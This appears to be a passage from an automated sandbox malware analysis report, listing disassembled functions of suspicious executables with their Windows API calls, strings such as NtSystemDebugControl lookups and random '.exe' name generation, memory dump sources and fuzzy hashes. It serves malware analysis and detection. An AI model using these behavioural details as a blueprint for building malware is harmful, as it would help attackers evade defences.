Snapshot File: hcaresult_1_2_ae0000_RRqyIX.jbxd

Similarity

API ID: Virtual$FreeHandleProcess$AddressAllocCloseCurrentModuleOpenProc
String ID: C:\Users\user\AppData\Local\Temp\RRqyIX.exe$ZwQuerySystemInformation$ntdll.dll
API String ID: 1500695312-1125738525
Opcode ID: bc43459f18e7fc3a0a14731275bcf7bfd29c0ec9140414bbf227d350b55a71b6
Instruction ID: 8ff5b6c05890d3dd671d54e2b43a99c9f7a18b07b607b3edaa5e440c22c2868a
Opcode Fuzzy Hash: bc43459f18e7fc3a0a14731275bcf7bfd29c0ec9140414bbf227d350b55a71b6
Instruction Fuzzy Hash: 7A21D7726053A1ABDB20DB96DC48FAFBAA8FB45B11F400928F645EB240C770DA45C7A5

Function 00AE2692 Relevance: 12.1, APIs: 8, Instructions: 64stringsynchronizationCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000000,00000001,00000000,7622E800,?,?,00AE29DB,?,00000001), ref: 00AE26A7
WaitForSingleObject.KERNEL32(00000000,000000FF,7622E800,?,?,00AE29DB,?,00000001), ref: 00AE26B5
lstrlen.KERNEL32(?), ref: 00AE26C4
??2@YAPAXI@Z.MSVCRT ref: 00AE26CE
lstrcpy.KERNEL32(00000004,?), ref: 00AE26E3
lstrcpy.KERNEL32(?,00000004), ref: 00AE271F
??3@YAXPAX@Z.MSVCRT ref: 00AE272D
SetEvent.KERNEL32 ref: 00AE273C

Memory Dump Source

Source File: 00000001.00000002.2245576704.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000001.00000002.2245553805.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2245596654.0000000000AE3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2245614022.0000000000AE4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2245632934.0000000000AE6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ae0000_RRqyIX.jbxd

Similarity

API ID: Eventlstrcpy$??2@??3@CreateObjectSingleWaitlstrlen
String ID:
API String ID: 41106472-0
Opcode ID: c3d8361641fc17974fb0747937f855ae1fb0194e1bec0ca255045f10b60a934e
Instruction ID: 1551ca18c09a50e8a0c3236c9b9489ad187a986dd74babc1e021340fa70632ee
Opcode Fuzzy Hash: c3d8361641fc17974fb0747937f855ae1fb0194e1bec0ca255045f10b60a934e
Instruction Fuzzy Hash: E1116D76500290EFCB32DF96EDC89AA7BBEFB887217144115F8589F120D7709D86DB90

Function 00AE1B8A Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 81stringCOMMON

Download Yara Rule

APIs

srand.MSVCRT ref: 00AE1BCD
rand.MSVCRT ref: 00AE1BD8
memset.MSVCRT ref: 00AE1C43
memcpy.MSVCRT ref: 00AE1C4F
lstrcat.KERNEL32(?,.exe), ref: 00AE1C5D

Strings

.exe, xrefs: 00AE1C57
wkcYJpeHoCOlEOnjzTXdmIRlYsDUVMLhTbCPAWytDyFiSzkglMoByPuscUzdEQeiBtFgXfvgsaWqnqMKIkhjfvVSRGAofGWBRXxLeNbiUZItaDOqxGbrNPmrZKrJxmjdHSQTYZKapJupFnEcQHwAwVhLNCvu, xrefs: 00AE1B8A, 00AE1B9C, 00AE1C15, 00AE1C49

Memory Dump Source

Source File: 00000001.00000002.2245576704.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000001.00000002.2245553805.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2245596654.0000000000AE3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2245614022.0000000000AE4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2245632934.0000000000AE6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ae0000_RRqyIX.jbxd

Similarity

API ID: lstrcatmemcpymemsetrandsrand
String ID: .exe$wkcYJpeHoCOlEOnjzTXdmIRlYsDUVMLhTbCPAWytDyFiSzkglMoByPuscUzdEQeiBtFgXfvgsaWqnqMKIkhjfvVSRGAofGWBRXxLeNbiUZItaDOqxGbrNPmrZKrJxmjdHSQTYZKapJupFnEcQHwAwVhLNCvu
API String ID: 122620767-1506007127
Opcode ID: 2bc7f6f78d8c2d9acc94cb8ebc27dc1a6125b682403b65fda97e099d0ca12e41
Instruction ID: 96cdaf1dbfcab8116c52cf453694b566ef93f54d9844b217511f95a7f8fb787e
Opcode Fuzzy Hash: 2bc7f6f78d8c2d9acc94cb8ebc27dc1a6125b682403b65fda97e099d0ca12e41
Instruction Fuzzy Hash: 4C216833E442E06EE226933BACC0BAE3B489FEB721F254099F5954F192D17409938361

Function 00AE189D Relevance: 9.1, APIs: 6, Instructions: 51processsynchronizationCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00AE18B1
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,?,?,000007D0,76230F00,76938400), ref: 00AE18D3
CloseHandle.KERNEL32(00AE2549), ref: 00AE18E9
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00AE18F0
GetExitCodeProcess.KERNEL32(?,00AE2549), ref: 00AE1901
CloseHandle.KERNEL32(?), ref: 00AE190A

Memory Dump Source

Source File: 00000001.00000002.2245576704.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000001.00000002.2245553805.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2245596654.0000000000AE3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2245614022.0000000000AE4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2245632934.0000000000AE6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ae0000_RRqyIX.jbxd

Similarity

API ID: CloseHandleProcess$CodeCreateExitObjectSingleWaitmemset
String ID:
API String ID: 876959470-0
Opcode ID: 6ad2a1549c3b8b9f5d229a215bed0ec1bba44749786ab14c4ad96fb28e73b46b
Instruction ID: 1d763bd0fa1db7d18c358276fa58755e5df3048a4253493703887930a59a81a0
Opcode Fuzzy Hash: 6ad2a1549c3b8b9f5d229a215bed0ec1bba44749786ab14c4ad96fb28e73b46b
Instruction Fuzzy Hash: 78015A729011A8BBCF21ABD6DC48DEFBF3DEB85720F104021FA15A61A0D6714A19CBA0

Function 00AE1319 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 53libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ntdll.dll,NtSystemDebugControl,-00000094,-00000094,0000000C,0000000C,00000001), ref: 00AE1334
GetProcAddress.KERNEL32(00000000), ref: 00AE133B
memset.MSVCRT ref: 00AE1359

Strings

NtSystemDebugControl, xrefs: 00AE132A
ntdll.dll, xrefs: 00AE132F

Memory Dump Source

Source File: 00000001.00000002.2245576704.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000001.00000002.2245553805.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2245596654.0000000000AE3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2245614022.0000000000AE4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2245632934.0000000000AE6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ae0000_RRqyIX.jbxd

Similarity

API ID: AddressHandleModuleProcmemset
String ID: NtSystemDebugControl$ntdll.dll
API String ID: 3137504439-2438149413
Opcode ID: 8a3adf4485680713a00b3d119f9a003dfd24e45ec2865c7e35d5a3d8e10fe74a
Instruction ID: cf9b175183f129de0d1410b4d9e603aeac91308ee4f2c17a1a47072de7fc3d11
Opcode Fuzzy Hash: 8a3adf4485680713a00b3d119f9a003dfd24e45ec2865c7e35d5a3d8e10fe74a
Instruction Fuzzy Hash: 98015B7260029ABFDF10DF96AC89A6FBBACFB45314F00456AF911AA141E27086558B51

Function 00AE1DF6 Relevance: 7.5, APIs: 5, Instructions: 45stringCOMMON

Download Yara Rule

APIs

strrchr.MSVCRT ref: 00AE1E0B
lstrcpy.KERNEL32(?,00000001), ref: 00AE1E1C
strrchr.MSVCRT ref: 00AE1E2B
lstrcmpiA.KERNEL32(?,00AE4488), ref: 00AE1E48
lstrlen.KERNEL32(00AE4488), ref: 00AE1E53

Memory Dump Source

Source File: 00000001.00000002.2245576704.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000001.00000002.2245553805.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2245596654.0000000000AE3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2245614022.0000000000AE4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2245632934.0000000000AE6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ae0000_RRqyIX.jbxd

Similarity

API ID: strrchr$lstrcmpilstrcpylstrlen
String ID:
API String ID: 3636361484-0
Opcode ID: 2297c51745b9d46fdbab0343b525e3272e0de2118e606a55a5bb0d8c2a504811
Instruction ID: 373938d71841a18fa051e878649237c7da5948c41b9fe651219f64af4aa7faaa
Opcode Fuzzy Hash: 2297c51745b9d46fdbab0343b525e3272e0de2118e606a55a5bb0d8c2a504811
Instruction Fuzzy Hash: FA01DB739042A56FDF10D760DC48BE6779CDB04310F440065F945D7090D6749E858B90

Function 00AE185B Relevance: 7.5, APIs: 5, Instructions: 31timeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(00AE1F92,00000000,?,00000000,?,?,?,00AE1F92,?,00000000,00000002), ref: 00AE1867
srand.MSVCRT ref: 00AE1878
rand.MSVCRT ref: 00AE1880
srand.MSVCRT ref: 00AE1890
rand.MSVCRT ref: 00AE1894

Memory Dump Source

Source File: 00000001.00000002.2245576704.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000001.00000002.2245553805.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2245596654.0000000000AE3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2245614022.0000000000AE4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2245632934.0000000000AE6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ae0000_RRqyIX.jbxd

Similarity

API ID: Timerandsrand$FileSystem
String ID:
API String ID: 4106363736-0
Opcode ID: 00206501626b8fa81447dadbc0e05e6abbdc81058ef757b0ce5956361dbf7e92
Instruction ID: 6240f7a49db1f0218f020682c8272682e98df545d1ca7e5d0886a3e3e8ab59b3
Opcode Fuzzy Hash: 00206501626b8fa81447dadbc0e05e6abbdc81058ef757b0ce5956361dbf7e92
Instruction Fuzzy Hash: 6BE04877A10218BBDB00E7F9EC8A99EBBACDE84161B110567F600D3254E574FD458BB4

Function 00AE6014 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00AE603C
GetProcAddress.KERNEL32(00000000,00AE6064), ref: 00AE604F

Strings

kernel32.dll, xrefs: 00AE603B

Memory Dump Source

Source File: 00000001.00000002.2245632934.0000000000AE6000.00000040.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000001.00000002.2245553805.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2245576704.0000000000AE1000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2245596654.0000000000AE3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2245614022.0000000000AE4000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ae0000_RRqyIX.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: kernel32.dll
API String ID: 1646373207-1793498882
Opcode ID: 254e83e023be0b14e37026dee7b709b039a573018019ff4d03e5699e77b7a161
Instruction ID: ee80a65920f88128ecf1fdaa23a52210d69a4cf557e80c99bed413c2c8debd6c
Opcode Fuzzy Hash: 254e83e023be0b14e37026dee7b709b039a573018019ff4d03e5699e77b7a161
Instruction Fuzzy Hash: 9BF0F0F11402D99FEF70CFA9CC44BDE3BE4EB25750F50482AEA09CB281CB3486058B25

Analysis Process: server.exePID: 6864, Parent PID: 6620COMMON

Execution Graph

Execution Coverage:	30%
Dynamic/Decrypted Code Coverage:	86%
Signature Coverage:	13.1%
Total number of Nodes:	107
Total number of Limit Nodes:	5

Executed Functions

Function 02FD4290 Relevance: 13.2, Strings: 9, Instructions: 1950COMMON

Download Yara Rule

Strings

:@%l, xrefs: 02FD4E3B
:@%l, xrefs: 02FD5539
:@%l, xrefs: 02FD4D92
:@%l, xrefs: 02FD457A
2Ll, xrefs: 02FD5415
:@%l, xrefs: 02FD4CEB
\OLl, xrefs: 02FD6AF1
:@%l, xrefs: 02FD6CED
@, xrefs: 02FD4C1C

Memory Dump Source

Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fd0000_server.jbxd

Similarity

API ID:
String ID: :@%l$:@%l$:@%l$:@%l$:@%l$:@%l$@$\OLl$2Ll
API String ID: 0-3567625124
Opcode ID: ba03bd7603ea82f00e8ceb5cad46cb5e814523cde9e508a7afd9be1edd6acfba
Instruction ID: b58074c65513c980bbc518dadf147b0efaed309218a58869f73935e133c1edbc
Opcode Fuzzy Hash: ba03bd7603ea82f00e8ceb5cad46cb5e814523cde9e508a7afd9be1edd6acfba
Instruction Fuzzy Hash: 79231674A412288FDB25DF20D8A4BADB7B6FB49308F0041EAD509A77A0DF359E85CF51

Function 02FD427F Relevance: 13.0, Strings: 9, Instructions: 1746COMMON

Download Yara Rule

Strings

, xrefs: 02FD4BBC
:@%l, xrefs: 02FD4E3B
:@%l, xrefs: 02FD5539
:@%l, xrefs: 02FD4D92
:@%l, xrefs: 02FD457A
2Ll, xrefs: 02FD5415
:@%l, xrefs: 02FD4CEB
\OLl, xrefs: 02FD6AF1
:@%l, xrefs: 02FD6CED

Memory Dump Source

Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fd0000_server.jbxd

Similarity

API ID:
String ID: $:@%l$:@%l$:@%l$:@%l$:@%l$:@%l$\OLl$2Ll
API String ID: 0-4176283887
Opcode ID: b78b1de8f6a20859c3e6c6bd7ab30ef01a1db6c229401421451be1624b8892b0
Instruction ID: aca94dd3ef999887ceba40388db704195abd9f3616684bb17d90fd9b8fb04d26
Opcode Fuzzy Hash: b78b1de8f6a20859c3e6c6bd7ab30ef01a1db6c229401421451be1624b8892b0
Instruction Fuzzy Hash: 6A132774A412288FDB25DF20D864BADB7B6FB49308F0041EAD949A77A0CF359E85CF51

Function 02FD44E9 Relevance: 12.9, Strings: 9, Instructions: 1624COMMON

Download Yara Rule

Strings

, xrefs: 02FD4BBC
:@%l, xrefs: 02FD4E3B
:@%l, xrefs: 02FD5539
:@%l, xrefs: 02FD4D92
:@%l, xrefs: 02FD457A
2Ll, xrefs: 02FD5415
:@%l, xrefs: 02FD4CEB
\OLl, xrefs: 02FD6AF1
:@%l, xrefs: 02FD6CED

Memory Dump Source

Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fd0000_server.jbxd

Similarity

API ID:
String ID: $:@%l$:@%l$:@%l$:@%l$:@%l$:@%l$\OLl$2Ll
API String ID: 0-4176283887
Opcode ID: b498e115d24f73cd70ba057ae1c9a1b13d825aa5545679bd6c90e5d88473bee0
Instruction ID: 703a3d13cb51ed03477a27c853c6eab1719267ff64c126f22e9f59c2e37e07dd
Opcode Fuzzy Hash: b498e115d24f73cd70ba057ae1c9a1b13d825aa5545679bd6c90e5d88473bee0
Instruction Fuzzy Hash: 18032774A412288FDB25DF20D864BADB7B6FB49308F0041EAD949A77A0CF359E85CF51

Function 02FD453C Relevance: 12.9, Strings: 9, Instructions: 1618COMMON

Download Yara Rule

Strings

, xrefs: 02FD4BBC
:@%l, xrefs: 02FD4E3B
:@%l, xrefs: 02FD5539
:@%l, xrefs: 02FD4D92
:@%l, xrefs: 02FD457A
2Ll, xrefs: 02FD5415
:@%l, xrefs: 02FD4CEB
\OLl, xrefs: 02FD6AF1
:@%l, xrefs: 02FD6CED

Memory Dump Source

Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fd0000_server.jbxd

Similarity

API ID:
String ID: $:@%l$:@%l$:@%l$:@%l$:@%l$:@%l$\OLl$2Ll
API String ID: 0-4176283887
Opcode ID: cdf2dd14e31641f29bf2eab531025076bb09c9ee82a716671189eaa01ebd9625
Instruction ID: 642c128218253077311b5817a35efb674b99d0e275781c5d715ce968a2802356
Opcode Fuzzy Hash: cdf2dd14e31641f29bf2eab531025076bb09c9ee82a716671189eaa01ebd9625
Instruction Fuzzy Hash: 73032774A412288FDB25DF20D864BADB7B6FB49308F0041EAD949A77A0CF359E85CF51

Function 02FD4628 Relevance: 11.6, Strings: 8, Instructions: 1579COMMON

Download Yara Rule

Strings

, xrefs: 02FD4BBC
:@%l, xrefs: 02FD4E3B
:@%l, xrefs: 02FD5539
:@%l, xrefs: 02FD4D92
2Ll, xrefs: 02FD5415
:@%l, xrefs: 02FD4CEB
\OLl, xrefs: 02FD6AF1
:@%l, xrefs: 02FD6CED

Memory Dump Source

Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fd0000_server.jbxd

Similarity

API ID:
String ID: $:@%l$:@%l$:@%l$:@%l$:@%l$\OLl$2Ll
API String ID: 0-3954461808
Opcode ID: 6227903391b4c78ddc17ae76f96d035a2ce2a4b41dd2bbd0bfd14420bbd692d7
Instruction ID: 7ca94811575ae64a91345e2b9567f77f8a24366ce880a3ec11c22f82531bd877
Opcode Fuzzy Hash: 6227903391b4c78ddc17ae76f96d035a2ce2a4b41dd2bbd0bfd14420bbd692d7
Instruction Fuzzy Hash: 3C032774A412288FDB25DF20D864BADB7B6FB49308F0041EAD949A73A0DF359E85CF51

Function 02FD4707 Relevance: 11.5, Strings: 8, Instructions: 1544
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

, xrefs: 02FD4BBC
:@%l, xrefs: 02FD4E3B
:@%l, xrefs: 02FD5539
:@%l, xrefs: 02FD4D92
2Ll, xrefs: 02FD5415
:@%l, xrefs: 02FD4CEB
\OLl, xrefs: 02FD6AF1
:@%l, xrefs: 02FD6CED

Memory Dump Source

Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fd0000_server.jbxd

Similarity

API ID:
String ID: $:@%l$:@%l$:@%l$:@%l$:@%l$\OLl$2Ll
API String ID: 0-3954461808
Opcode ID: c31372f84f87378edc5b06d333c8057bb90bd5e4bbecab15bd9d8a2f8d10e545
Instruction ID: 27bf8fe6fab86384b60bca11b0e13528f633c62942eb4f72315e19a762c61949
Opcode Fuzzy Hash: c31372f84f87378edc5b06d333c8057bb90bd5e4bbecab15bd9d8a2f8d10e545
Instruction Fuzzy Hash: 6DF22774A412288FDB25DF20D864BADB7B6FB49308F0041EAD949A73A0DF359E85CF51

Function 02FD47CC Relevance: 11.5, Strings: 8, Instructions: 1513
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

, xrefs: 02FD4BBC
:@%l, xrefs: 02FD4E3B
:@%l, xrefs: 02FD5539
:@%l, xrefs: 02FD4D92
2Ll, xrefs: 02FD5415
:@%l, xrefs: 02FD4CEB
\OLl, xrefs: 02FD6AF1
:@%l, xrefs: 02FD6CED

Memory Dump Source

Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fd0000_server.jbxd

Similarity

API ID:
String ID: $:@%l$:@%l$:@%l$:@%l$:@%l$\OLl$2Ll
API String ID: 0-3954461808
Opcode ID: b569e320df1f852f9c1a927691a6c4014f14c0b25fd78d4ee53af57ff18b96ee
Instruction ID: de1be9adc474b922f510a4916324e96e49b307e6ee9d737b7d23e6718b7915e4
Opcode Fuzzy Hash: b569e320df1f852f9c1a927691a6c4014f14c0b25fd78d4ee53af57ff18b96ee
Instruction Fuzzy Hash: 43F22874A412288FDB25DF20D864BADB7B6FB49308F0041EAD949A73A0DF359E85CF51

Function 02FD492E Relevance: 11.5, Strings: 8, Instructions: 1456
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

, xrefs: 02FD4BBC
:@%l, xrefs: 02FD4E3B
:@%l, xrefs: 02FD5539
:@%l, xrefs: 02FD4D92
2Ll, xrefs: 02FD5415
:@%l, xrefs: 02FD4CEB
\OLl, xrefs: 02FD6AF1
:@%l, xrefs: 02FD6CED

Memory Dump Source

Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fd0000_server.jbxd

Similarity

API ID:
String ID: $:@%l$:@%l$:@%l$:@%l$:@%l$\OLl$2Ll
API String ID: 0-3954461808
Opcode ID: 4eb9bae9d34f8f14f66137441f5b1731d18397a4b5c1c068a9b68262efdf46db
Instruction ID: a27de7d91f6769598acec0b6ee14bcfe36542f61bcef31e41d0d87235d7902a7
Opcode Fuzzy Hash: 4eb9bae9d34f8f14f66137441f5b1731d18397a4b5c1c068a9b68262efdf46db
Instruction Fuzzy Hash: C9F22874A412288FDB25DF20D864BADB7B6FB49308F0041EAD949A73A0DF359E85CF51

Function 02FD4995 Relevance: 11.4, Strings: 8, Instructions: 1447
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

, xrefs: 02FD4BBC
:@%l, xrefs: 02FD4E3B
:@%l, xrefs: 02FD5539
:@%l, xrefs: 02FD4D92
2Ll, xrefs: 02FD5415
:@%l, xrefs: 02FD4CEB
\OLl, xrefs: 02FD6AF1
:@%l, xrefs: 02FD6CED

Memory Dump Source

Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fd0000_server.jbxd

Similarity

API ID:
String ID: $:@%l$:@%l$:@%l$:@%l$:@%l$\OLl$2Ll
API String ID: 0-3954461808
Opcode ID: 1eae425573403eeca7e776cc8cac98745821b61084a231381204eaacc28be9e9
Instruction ID: 0481aa4e1ae8b60d1100c7e5440bb733bc6530be41536cf9aac6239599afd7f8
Opcode Fuzzy Hash: 1eae425573403eeca7e776cc8cac98745821b61084a231381204eaacc28be9e9
Instruction Fuzzy Hash: 86F22874A412288FDB25DF20D864BADB7B6FB49308F0041EAD949A73A0DF359E85CF51

Function 02FD49F1 Relevance: 11.4, Strings: 8, Instructions: 1440
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

, xrefs: 02FD4BBC
:@%l, xrefs: 02FD4E3B
:@%l, xrefs: 02FD5539
:@%l, xrefs: 02FD4D92
2Ll, xrefs: 02FD5415
:@%l, xrefs: 02FD4CEB
\OLl, xrefs: 02FD6AF1
:@%l, xrefs: 02FD6CED

Memory Dump Source

Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fd0000_server.jbxd

Similarity

API ID:
String ID: $:@%l$:@%l$:@%l$:@%l$:@%l$\OLl$2Ll
API String ID: 0-3954461808
Opcode ID: 9a1e77f93b23f2f7c75e43309716864367516f5cea4a8ae8fae6e81f6fca7a45
Instruction ID: 3f333a8bb6bd5a1e483ca32d4561da27d1a2001d6b7800e6607c9d8fef8cd737
Opcode Fuzzy Hash: 9a1e77f93b23f2f7c75e43309716864367516f5cea4a8ae8fae6e81f6fca7a45
Instruction Fuzzy Hash: B9F22874A412288FDB25DF20D864BADB7B6FB49308F0041EAD949A73A0DF359E85CF51

Function 02FD4B53 Relevance: 11.4, Strings: 8, Instructions: 1383
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

, xrefs: 02FD4BBC
:@%l, xrefs: 02FD4E3B
:@%l, xrefs: 02FD5539
:@%l, xrefs: 02FD4D92
2Ll, xrefs: 02FD5415
:@%l, xrefs: 02FD4CEB
\OLl, xrefs: 02FD6AF1
:@%l, xrefs: 02FD6CED

Memory Dump Source

Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fd0000_server.jbxd

Similarity

API ID:
String ID: $:@%l$:@%l$:@%l$:@%l$:@%l$\OLl$2Ll
API String ID: 0-3954461808
Opcode ID: 3391b5e1caed41fc65dd6da3351d96f2552004da23cb0260d86e3224803463f1
Instruction ID: 0c23fecd79dc8a48e5c7d9a52ca65843a2a7d639471784f3dbc0e4cb144fc6b5
Opcode Fuzzy Hash: 3391b5e1caed41fc65dd6da3351d96f2552004da23cb0260d86e3224803463f1
Instruction Fuzzy Hash: 5DE22874A412288FDB25DF20D864BADB7B6FB49308F0041EAD949A73A0DF359E85CF51

Function 02FD4C87 Relevance: 10.1, Strings: 7, Instructions: 1362
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

:@%l, xrefs: 02FD4E3B
:@%l, xrefs: 02FD5539
:@%l, xrefs: 02FD4D92
2Ll, xrefs: 02FD5415
:@%l, xrefs: 02FD4CEB
\OLl, xrefs: 02FD6AF1
:@%l, xrefs: 02FD6CED

Memory Dump Source

Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fd0000_server.jbxd

Similarity

API ID:
String ID: :@%l$:@%l$:@%l$:@%l$:@%l$\OLl$2Ll
API String ID: 0-63203912
Opcode ID: c1c5f9ae2fcc2b6211db3da7129922a20c8cf1c1e48e8d44a567cdf811674f20
Instruction ID: f9223cd41864c7900e08fda9748cb1e1e86564afa8388c6c5e4560d40f0916f6
Opcode Fuzzy Hash: c1c5f9ae2fcc2b6211db3da7129922a20c8cf1c1e48e8d44a567cdf811674f20
Instruction Fuzzy Hash: 3BE23874A412288FDB25DF20D864BADB7B6FB49308F0041EAD949A73A0DF359E85CF51

Function 02FD4F27 Relevance: 6.2, Strings: 4, Instructions: 1245
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

:@%l, xrefs: 02FD5539
2Ll, xrefs: 02FD5415
\OLl, xrefs: 02FD6AF1
:@%l, xrefs: 02FD6CED

Memory Dump Source

Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fd0000_server.jbxd

Similarity

API ID:
String ID: :@%l$:@%l$\OLl$2Ll
API String ID: 0-3794265009
Opcode ID: 74aa7b43a794e34a279f50dafdb302626c2bac05d17ba4819f072f5e51019df7
Instruction ID: af85a4e11cb941fe5b43f751a876b1d3174f34c8df2a16975f868bdd448c64c7
Opcode Fuzzy Hash: 74aa7b43a794e34a279f50dafdb302626c2bac05d17ba4819f072f5e51019df7
Instruction Fuzzy Hash: 27D21675A412288FDB25DF20D864BADB7B6FB49308F0041EAD949A73A0DF359E84CF51

Function 02FD4F95 Relevance: 6.2, Strings: 4, Instructions: 1236
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

:@%l, xrefs: 02FD5539
2Ll, xrefs: 02FD5415
\OLl, xrefs: 02FD6AF1
:@%l, xrefs: 02FD6CED

Memory Dump Source

Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fd0000_server.jbxd

Similarity

API ID:
String ID: :@%l$:@%l$\OLl$2Ll
API String ID: 0-3794265009
Opcode ID: 25a4236052f2daf0888960ec347d8e4c03c2f96649f075131073fec57ca63041
